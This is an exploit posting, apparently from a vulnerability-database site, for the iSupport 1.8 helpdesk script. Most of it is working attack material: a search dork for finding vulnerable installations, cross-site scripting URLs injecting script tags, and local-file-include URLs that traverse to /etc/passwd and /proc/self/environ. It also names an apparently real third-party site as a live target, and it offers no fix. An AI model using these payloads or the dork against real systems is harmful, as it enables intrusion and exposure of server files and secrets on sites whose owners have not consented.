iSupport <= 1.8 XSS/Local File Include Exploit

2009.12.30
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-79

--------------------------------------------- ++ iSupport <= 1.8 ++ XSS/Local File Include Exploit --------------------------------------------- Discovered by : Stink' & Essandre DATE : 16/12/09 ////////////////////////////////////////////////////////////////////// Website : http://www.idevspot.com/ DEMO : http://www.idevspot.com/demo/iSupport/ DOWNLOAD : http://www.idevspot.com/iSupport.php => $ ////////////////////////////////////////////////////////////////////// [+] Vulnerability and Exploitation Dork : "Powered by [ iSupport 1.8 ]" --[XSS]-- http://[TARGET]/[PATH]/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=[XSS] http://[TARGET]/[PATH]/function.php?which=[XSS] Exemple : http://server/helpdesk/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E http://serverhelpdesk/function.php?which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E --[XSS]-- in the member zone http://jvdominator.com/helpdesk/index.php?include_file=ticket_submit.php The flaw is in the form. In "Subject, Comments, etc. ..." After clicking "Submit Ticket" and you have your alert xss:) --[LFI]-- http://[TARGET]/[PATH]/index.php?include_file=[LFI] Exemple : http://server/helpdesk/index.php?include_file=../../../../../proc/self/environ http://server/helpdesk/index.php?include_file=../../../../../etc/passwd [+] Solution : N/A The flaw is secure on some site, but we do not know if the publisher or persons using the scripts that are secure.

References:

http://xforce.iss.net/xforce/xfdb/54859
http://xforce.iss.net/xforce/xfdb/54858
http://www.securityfocus.com/bid/37380
http://www.osvdb.org/61112
http://www.osvdb.org/61111
http://www.osvdb.org/61109
http://www.exploit-db.com/exploits/10478
http://secunia.com/advisories/37726
http://packetstormsecurity.org/0912-exploits/isupport-lfixss.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top